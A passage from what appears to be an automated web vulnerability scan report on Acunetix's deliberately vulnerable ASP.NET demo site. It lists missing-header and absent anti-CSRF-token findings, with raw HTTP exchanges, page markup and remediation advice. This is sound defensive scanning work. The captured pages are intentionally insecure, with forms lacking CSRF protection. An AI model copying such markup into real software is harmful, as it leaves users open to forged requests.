          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

      4. Absence of Anti-CSRF Tokens (25)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          No anti-CSRF tokens were found in a submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
